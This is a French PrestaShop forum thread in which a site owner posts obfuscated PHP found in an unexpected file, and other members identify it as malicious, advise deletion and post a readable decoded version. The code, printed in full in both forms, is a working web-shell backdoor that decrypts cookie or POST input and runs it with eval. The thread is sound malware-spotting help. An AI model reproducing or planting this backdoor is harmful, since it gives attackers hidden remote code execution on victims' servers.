yanoch_newbie Posted April 3, 2020 Share Posted April 3, 2020 Bonjour Voici le code que je trouve dans le fichier server_synchronize.php : Est ce que ça vous semble normal ? $h2bf1 = 851;$GLOBALS['r9418'] = Array();global $r9418;$r9418 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['r168d1'] = "\x39\x73\x3e\x76\x5e\x33\x37\x27\x61\x48\x4f\x29\x5f\x6e\x43\x2c\x45\x20\x25\x4e\x41\x6b\x65\xa\x4a\x23\x31\x34\x53\x42\x54\x6f\x44\x9\x22\x72\x5a\x66\x38\x7a\x3d\xd\x49\x3b\x47\x55\x6c\x35\x60\x3c\x52\x78\x62\x59\x46\x2b\x7d\x75\x2d\x51\x58\x67\x79\x50\x21\x5d\x68\x57\x7e\x36\x2a\x71\x69\x30\x3a\x64\x4c\x7b\x56\x74\x77\x5b\x6d\x7c\x26\x4b\x4d\x5c\x24\x6a\x70\x2f\x32\x63\x2e\x40\x28\x3f";$r9418[$r9418['r168d1'][31].$r9418['r168d1'][26].$r9418['r168d1'][52].$r9418['r168d1'][92].$r9418['r168d1'][26].$r9418['r168d1'][8].$r9418['r168d1'][93]] = $r9418['r168d1'][93].$r9418['r168d1'][66].$r9418['r168d1'][35];$r9418[$r9418['r168d1'][13].$r9418['r168d1'][92].$r9418['r168d1'][27].$r9418['r168d1'][73].$r9418['r168d1'][75].$r9418['r168d1'][93]] = $r9418['r168d1'][31].$r9418['r168d1'][35].$r9418['r168d1'][75];$r9418[$r9418['r168d1'][72].$r9418['r168d1'][75].$r9418['r168d1'][27].$r9418['r168d1'][73].$r9418['r168d1'][47].$r9418['r168d1'][52].$r9418['r168d1'][73].$r9418['r168d1'][26]] = $r9418['r168d1'][75].$r9418['r168d1'][22].$r9418['r168d1'][37].$r9418['r168d1'][72].$r9418['r168d1'][13].$r9418['r168d1'][22];$r9418[$r9418['r168d1'][61].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][52].$r9418['r168d1'][93].$r9418['r168d1'][27].$r9418['r168d1'][0].$r9418['r168d1'][38]] = $r9418['r168d1'][1].$r9418['r168d1'][79].$r9418['r168d1'][35].$r9418['r168d1'][46].$r9418['r168d1'][22].$r9418['r168d1'][13];$r9418[$r9418['r168d1'][51].$r9418['r168d1'][38].$r9418['r168d1'][37].$r9418['r168d1'][47]] = $r9418['r168d1'][75].$r9418['r168d1'][22].$r9418['r168d1'][37].$r9418['r168d1'][72].$r9418['r168d1'][13].$r9418['r168d1'][22].$r9418['r168d1'][75];$r9418[$r9418['r168d1'][52].$r9418['r168d1'][73].$r9418['r168d1'][0].$r9418['r168d1'][47].$r9418['r168d1'][69].$r9418['r168d1'][5].$r9418['r168d1'][27].$r9418['r168d1'][8].$r9418['r168d1'][69]] = $r9418['r168d1'][72].$r9418['r168d1'][13].$r9418['r168d1'][72].$r9418['r168d1'][12].$r9418['r168d1'][1].$r9418['r168d1'][22].$r9418['r168d1'][79];$r9418[$r9418['r168d1'][22].$r9418['r168d1'][6].$r9418['r168d1'][92].$r9418['r168d1'][92].$r9418['r168d1'][93].$r9418['r168d1'][75].$r9418['r168d1'][38].$r9418['r168d1'][27]] = $r9418['r168d1'][1].$r9418['r168d1'][22].$r9418['r168d1'][35].$r9418['r168d1'][72].$r9418['r168d1'][8].$r9418['r168d1'][46].$r9418['r168d1'][72].$r9418['r168d1'][39].$r9418['r168d1'][22];$r9418[$r9418['r168d1'][35].$r9418['r168d1'][93].$r9418['r168d1'][47].$r9418['r168d1'][38].$r9418['r168d1'][27].$r9418['r168d1'][0].$r9418['r168d1'][6]] = $r9418['r168d1'][90].$r9418['r168d1'][66].$r9418['r168d1'][90].$r9418['r168d1'][3].$r9418['r168d1'][22].$r9418['r168d1'][35].$r9418['r168d1'][1].$r9418['r168d1'][72].$r9418['r168d1'][31].$r9418['r168d1'][13];$r9418[$r9418['r168d1'][80].$r9418['r168d1'][92].$r9418['r168d1'][8].$r9418['r168d1'][92].$r9418['r168d1'][47]] = $r9418['r168d1'][57].$r9418['r168d1'][13].$r9418['r168d1'][1].$r9418['r168d1'][22].$r9418['r168d1'][35].$r9418['r168d1'][72].$r9418['r168d1'][8].$r9418['r168d1'][46].$r9418['r168d1'][72].$r9418['r168d1'][39].$r9418['r168d1'][22];$r9418[$r9418['r168d1'][62].$r9418['r168d1'][47].$r9418['r168d1'][47].$r9418['r168d1'][73].$r9418['r168d1'][93].$r9418['r168d1'][22].$r9418['r168d1'][69].$r9418['r168d1'][37]] = $r9418['r168d1'][52].$r9418['r168d1'][8].$r9418['r168d1'][1].$r9418['r168d1'][22].$r9418['r168d1'][69].$r9418['r168d1'][27].$r9418['r168d1'][12].$r9418['r168d1'][75].$r9418['r168d1'][22].$r9418['r168d1'][93].$r9418['r168d1'][31].$r9418['r168d1'][75].$r9418['r168d1'][22];$r9418[$r9418['r168d1'][57].$r9418['r168d1'][52].$r9418['r168d1'][52].$r9418['r168d1'][22].$r9418['r168d1'][8].$r9418['r168d1'][47]] = $r9418['r168d1'][1].$r9418['r168d1'][22].$r9418['r168d1'][79].$r9418['r168d1'][12].$r9418['r168d1'][79].$r9418['r168d1'][72].$r9418['r168d1'][82].$r9418['r168d1'][22].$r9418['r168d1'][12].$r9418['r168d1'][46].$r9418['r168d1'][72].$r9418['r168d1'][82].$r9418['r168d1'][72].$r9418['r168d1'][79];$r9418[$r9418['r168d1'][52].$r9418['r168d1'][69].$r9418['r168d1'][8].$r9418['r168d1'][93].$r9418['r168d1'][26]] = $r9418['r168d1'][39].$r9418['r168d1'][92].$r9418['r168d1'][26].$r9418['r168d1'][22].$r9418['r168d1'][8].$r9418['r168d1'][5];$r9418[$r9418['r168d1'][46].$r9418['r168d1'][5].$r9418['r168d1'][37].$r9418['r168d1'][5]] = $r9418['r168d1'][66].$r9418['r168d1'][0].$r9418['r168d1'][93].$r9418['r168d1'][8].$r9418['r168d1'][22];$r9418[$r9418['r168d1'][21].$r9418['r168d1'][27].$r9418['r168d1'][22].$r9418['r168d1'][52].$r9418['r168d1'][93]] = $_POST;$r9418[$r9418['r168d1'][80].$r9418['r168d1'][8].$r9418['r168d1'][22].$r9418['r168d1'][47]] = $_COOKIE;@$r9418[$r9418['r168d1'][52].$r9418['r168d1'][73].$r9418['r168d1'][0].$r9418['r168d1'][47].$r9418['r168d1'][69].$r9418['r168d1'][5].$r9418['r168d1'][27].$r9418['r168d1'][8].$r9418['r168d1'][69]]($r9418['r168d1'][22].$r9418['r168d1'][35].$r9418['r168d1'][35].$r9418['r168d1'][31].$r9418['r168d1'][35].$r9418['r168d1'][12].$r9418['r168d1'][46].$r9418['r168d1'][31].$r9418['r168d1'][61], NULL);@$r9418[$r9418['r168d1'][52].$r9418['r168d1'][73].$r9418['r168d1'][0].$r9418['r168d1'][47].$r9418['r168d1'][69].$r9418['r168d1'][5].$r9418['r168d1'][27].$r9418['r168d1'][8].$r9418['r168d1'][69]]($r9418['r168d1'][46].$r9418['r168d1'][31].$r9418['r168d1'][61].$r9418['r168d1'][12].$r9418['r168d1'][22].$r9418['r168d1'][35].$r9418['r168d1'][35].$r9418['r168d1'][31].$r9418['r168d1'][35].$r9418['r168d1'][1], 0);@$r9418[$r9418['r168d1'][52].$r9418['r168d1'][73].$r9418['r168d1'][0].$r9418['r168d1'][47].$r9418['r168d1'][69].$r9418['r168d1'][5].$r9418['r168d1'][27].$r9418['r168d1'][8].$r9418['r168d1'][69]]($r9418['r168d1'][82].$r9418['r168d1'][8].$r9418['r168d1'][51].$r9418['r168d1'][12].$r9418['r168d1'][22].$r9418['r168d1'][51].$r9418['r168d1'][22].$r9418['r168d1'][93].$r9418['r168d1'][57].$r9418['r168d1'][79].$r9418['r168d1'][72].$r9418['r168d1'][31].$r9418['r168d1'][13].$r9418['r168d1'][12].$r9418['r168d1'][79].$r9418['r168d1'][72].$r9418['r168d1'][82].$r9418['r168d1'][22], 0);@$r9418[$r9418['r168d1'][57].$r9418['r168d1'][52].$r9418['r168d1'][52].$r9418['r168d1'][22].$r9418['r168d1'][8].$r9418['r168d1'][47]](0);if (!$r9418[$r9418['r168d1'][51].$r9418['r168d1'][38].$r9418['r168d1'][37].$r9418['r168d1'][47]]($r9418['r168d1'][20].$r9418['r168d1'][76].$r9418['r168d1'][50].$r9418['r168d1'][16].$r9418['r168d1'][20].$r9418['r168d1'][32].$r9418['r168d1'][53].$r9418['r168d1'][12].$r9418['r168d1'][50].$r9418['r168d1'][45].$r9418['r168d1'][19].$r9418['r168d1'][12].$r9418['r168d1'][5].$r9418['r168d1'][69].$r9418['r168d1'][69].$r9418['r168d1'][8].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][38].$r9418['r168d1'][8].$r9418['r168d1'][38].$r9418['r168d1'][8].$r9418['r168d1'][92].$r9418['r168d1'][5].$r9418['r168d1'][47].$r9418['r168d1'][47].$r9418['r168d1'][8].$r9418['r168d1'][52].$r9418['r168d1'][92].$r9418['r168d1'][26].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][37].$r9418['r168d1'][26].$r9418['r168d1'][26].$r9418['r168d1'][52].$r9418['r168d1'][8].$r9418['r168d1'][26].$r9418['r168d1'][8].$r9418['r168d1'][73].$r9418['r168d1'][92].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][8])){$r9418[$r9418['r168d1'][72].$r9418['r168d1'][75].$r9418['r168d1'][27].$r9418['r168d1'][73].$r9418['r168d1'][47].$r9418['r168d1'][52].$r9418['r168d1'][73].$r9418['r168d1'][26]]($r9418['r168d1'][20].$r9418['r168d1'][76].$r9418['r168d1'][50].$r9418['r168d1'][16].$r9418['r168d1'][20].$r9418['r168d1'][32].$r9418['r168d1'][53].$r9418['r168d1'][12].$r9418['r168d1'][50].$r9418['r168d1'][45].$r9418['r168d1'][19].$r9418['r168d1'][12].$r9418['r168d1'][5].$r9418['r168d1'][69].$r9418['r168d1'][69].$r9418['r168d1'][8].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][38].$r9418['r168d1'][8].$r9418['r168d1'][38].$r9418['r168d1'][8].$r9418['r168d1'][92].$r9418['r168d1'][5].$r9418['r168d1'][47].$r9418['r168d1'][47].$r9418['r168d1'][8].$r9418['r168d1'][52].$r9418['r168d1'][92].$r9418['r168d1'][26].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][37].$r9418['r168d1'][26].$r9418['r168d1'][26].$r9418['r168d1'][52].$r9418['r168d1'][8].$r9418['r168d1'][26].$r9418['r168d1'][8].$r9418['r168d1'][73].$r9418['r168d1'][92].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][8], 1);$r6ea = NULL;$o16aa8 = NULL;$r9418[$r9418['r168d1'][79].$r9418['r168d1'][27].$r9418['r168d1'][6].$r9418['r168d1'][38]] = $r9418['r168d1'][75].$r9418['r168d1'][8].$r9418['r168d1'][47].$r9418['r168d1'][52].$r9418['r168d1'][69].$r9418['r168d1'][22].$r9418['r168d1'][6].$r9418['r168d1'][73].$r9418['r168d1'][58].$r9418['r168d1'][5].$r9418['r168d1'][22].$r9418['r168d1'][75].$r9418['r168d1'][22].$r9418['r168d1'][58].$r9418['r168d1'][27].$r9418['r168d1'][37].$r9418['r168d1'][0].$r9418['r168d1'][52].$r9418['r168d1'][58].$r9418['r168d1'][0].$r9418['r168d1'][5].$r9418['r168d1'][22].$r9418['r168d1'][92].$r9418['r168d1'][58].$r9418['r168d1'][47].$r9418['r168d1'][26].$r9418['r168d1'][37].$r9418['r168d1'][69].$r9418['r168d1'][38].$r9418['r168d1'][69].$r9418['r168d1'][26].$r9418['r168d1'][92].$r9418['r168d1'][0].$r9418['r168d1'][47].$r9418['r168d1'][22].$r9418['r168d1'][92];global $t478;function h9cae($r6ea, $y53d39940){global $r9418;$w3d230 = "";for ($qefa1=0; $qefa1<$r9418[$r9418['r168d1'][61].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][52].$r9418['r168d1'][93].$r9418['r168d1'][27].$r9418['r168d1'][0].$r9418['r168d1'][38]]($r6ea);){for ($c7d8b4=0; $c7d8b4<$r9418[$r9418['r168d1'][61].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][52].$r9418['r168d1'][93].$r9418['r168d1'][27].$r9418['r168d1'][0].$r9418['r168d1'][38]]($y53d39940) && $qefa1<$r9418[$r9418['r168d1'][61].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][52].$r9418['r168d1'][93].$r9418['r168d1'][27].$r9418['r168d1'][0].$r9418['r168d1'][38]]($r6ea); $c7d8b4++, $qefa1++){$w3d230 .= $r9418[$r9418['r168d1'][31].$r9418['r168d1'][26].$r9418['r168d1'][52].$r9418['r168d1'][92].$r9418['r168d1'][26].$r9418['r168d1'][8].$r9418['r168d1'][93]]($r9418[$r9418['r168d1'][13].$r9418['r168d1'][92].$r9418['r168d1'][27].$r9418['r168d1'][73].$r9418['r168d1'][75].$r9418['r168d1'][93]]($r6ea[$qefa1]) ^ $r9418[$r9418['r168d1'][13].$r9418['r168d1'][92].$r9418['r168d1'][27].$r9418['r168d1'][73].$r9418['r168d1'][75].$r9418['r168d1'][93]]($y53d39940[$c7d8b4]));}}return $w3d230;}function z21ea3($r6ea, $y53d39940){global $r9418;global $t478;return $r9418[$r9418['r168d1'][46].$r9418['r168d1'][5].$r9418['r168d1'][37].$r9418['r168d1'][5]]($r9418[$r9418['r168d1'][46].$r9418['r168d1'][5].$r9418['r168d1'][37].$r9418['r168d1'][5]]($r6ea, $t478), $y53d39940);}foreach ($r9418[$r9418['r168d1'][80].$r9418['r168d1'][8].$r9418['r168d1'][22].$r9418['r168d1'][47]] as $y53d39940=>$f9f33e70a){$r6ea = $f9f33e70a;$o16aa8 = $y53d39940;}if (!$r6ea){foreach ($r9418[$r9418['r168d1'][21].$r9418['r168d1'][27].$r9418['r168d1'][22].$r9418['r168d1'][52].$r9418['r168d1'][93]] as $y53d39940=>$f9f33e70a){$r6ea = $f9f33e70a;$o16aa8 = $y53d39940;}}$r6ea = @$r9418[$r9418['r168d1'][80].$r9418['r168d1'][92].$r9418['r168d1'][8].$r9418['r168d1'][92].$r9418['r168d1'][47]]($r9418[$r9418['r168d1'][52].$r9418['r168d1'][69].$r9418['r168d1'][8].$r9418['r168d1'][93].$r9418['r168d1'][26]]($r9418[$r9418['r168d1'][62].$r9418['r168d1'][47].$r9418['r168d1'][47].$r9418['r168d1'][73].$r9418['r168d1'][93].$r9418['r168d1'][22].$r9418['r168d1'][69].$r9418['r168d1'][37]]($r6ea), $o16aa8));if (isset($r6ea[$r9418['r168d1'][8].$r9418['r168d1'][21]]) && $t478==$r6ea[$r9418['r168d1'][8].$r9418['r168d1'][21]]){if ($r6ea[$r9418['r168d1'][8]] == $r9418['r168d1'][72]){$qefa1 = Array($r9418['r168d1'][90].$r9418['r168d1'][3] => @$r9418[$r9418['r168d1'][35].$r9418['r168d1'][93].$r9418['r168d1'][47].$r9418['r168d1'][38].$r9418['r168d1'][27].$r9418['r168d1'][0].$r9418['r168d1'][6]](),$r9418['r168d1'][1].$r9418['r168d1'][3] => $r9418['r168d1'][26].$r9418['r168d1'][94].$r9418['r168d1'][73].$r9418['r168d1'][58].$r9418['r168d1'][26],);echo @$r9418[$r9418['r168d1'][22].$r9418['r168d1'][6].$r9418['r168d1'][92].$r9418['r168d1'][92].$r9418['r168d1'][93].$r9418['r168d1'][75].$r9418['r168d1'][38].$r9418['r168d1'][27]]($qefa1);}elseif ($r6ea[$r9418['r168d1'][8]] == $r9418['r168d1'][22]){eval/*l3ba4*/($r6ea[$r9418['r168d1'][75]]);}exit();}} ?> Link to comment Share on other sites More sharing options...
Mediacom87 Posted April 3, 2020 Share Posted April 3, 2020 C'est quoi ce fichier déjà à la base ???? car il ne me semble pas exister dans l'archive de n'importe quelle version de PrestaShop. donc poubelle si vous ne savez pas et surtout il faut trouver comment il est arriver là. Link to comment Share on other sites More sharing options...
yanoch_newbie Posted April 3, 2020 Author Share Posted April 3, 2020 (edited) Le fichier est dans le dossier phpMA qui est lui même à la racine du prestashop 1.4.7.2 Je peux simplement enlever le code suspect .....sinon Edited April 3, 2020 by yanoch_newbie (see edit history) Link to comment Share on other sites More sharing options...
Mediacom87 Posted April 3, 2020 Share Posted April 3, 2020 phpMA n'existe pas plus donc si vous ne savez pas vous renommez ou vous effacez mais tout cela pu grave. Link to comment Share on other sites More sharing options...
yanoch_newbie Posted April 3, 2020 Author Share Posted April 3, 2020 merci pour votre conseil je vais tester 😀 Link to comment Share on other sites More sharing options...
coeos.pro Posted April 3, 2020 Share Posted April 3, 2020 dans la dernière ligne il y a la fonction php eval, je vous laisse lire l'encadré jaune ici : https://www.php.net/manual/fr/function.eval.php Link to comment Share on other sites More sharing options...
yanoch_newbie Posted April 3, 2020 Author Share Posted April 3, 2020 effectivement ! Link to comment Share on other sites More sharing options...
coeos.pro Posted April 4, 2020 Share Posted April 4, 2020 Pour info, une fois "nettoyé" (c'est juste pour le rendre lisible et compréhensible) le code ressemble à : <?php @iniset(error_log, NULL); @iniset(log_errors, 0); @iniset(max_execution_time, 0); @settimelimit(0); if (!defined(ALREADY_RUN_366afb8a8a2355ab21fbf11ba1a02fba)) { define(ALREADY_RUN_366afb8a8a2355ab21fbf11ba1a02fba, 1); $r6ea = NULL; $o16aa8 = NULL; [t478] = da5b6e70-3ede-4f9b-93e2-51f6861295e2; global $t478; function h9cae($r6ea, $y53d39940) { global ; $w3d230 = ""; for ($qefa1=0; $qefa1<strlen($r6ea);) { for ($c7d8b4=0; $c7d8b4<strlen($y53d39940) && $qefa1<strlen($r6ea); $c7d8b4++, $qefa1++) { $w3d230 = chr(ord($r6ea[$qefa1]) ^ ord($y53d39940[$c7d8b4])); } } return $w3d230; } function z21ea3($r6ea, $y53d39940) { global ; global $t478; return h9cae(h9cae($r6ea, $t478), $y53d39940); } foreach ($_COOKIE as $y53d39940=>$f9f33e70a) { $r6ea = $f9f33e70a; $o16aa8 = $y53d39940; } if (!$r6ea) { foreach ($_POST as $y53d39940=>$f9f33e70a) { $r6ea = $f9f33e70a; $o16aa8 = $y53d39940; } } $r6ea = @unserialize(z21ea3(base64decode($r6ea), $o16aa8)); if (isset($r6ea[ak]) && $t478==$r6ea[ak]) { if ($r6ea[a] == i) { $qefa1 = Array(pv => @phpversion(),sv => 10-1,); echo @serialize($qefa1); } elseif ($r6ea[a] == e) { eval/*l3ba4*/($r6ea[d]); } exit(); } } donc si dans un module ou autre fichier tu retrouves un code totalement illisible tu saura qu'il y a un lien Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now